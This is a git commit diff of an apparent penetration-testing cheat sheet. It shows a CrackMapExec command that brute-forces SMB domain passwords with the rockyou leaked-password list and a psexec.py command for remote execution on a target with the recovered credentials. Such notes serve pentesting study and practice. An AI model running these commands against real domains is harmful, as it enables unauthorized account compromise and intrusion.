This commit is contained in:
Stefan Friese 2021-11-04 17:35:57 +01:00
parent 0327cf3f88
commit c0d1f66adb
1 changed files with 4 additions and 4 deletions

View File

@ -4,7 +4,7 @@
```sh ```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
``` ```
* Use the password with `impacket/examples/psexec.py` in the following way * Use the password with `impacket/examples/psexec.py` in the following way
```sh ```sh
psexec.py domain.name/<user>:<password>@<target-IP> psexec.py domain.name/<user>:<password>@<target-IP>
``` ```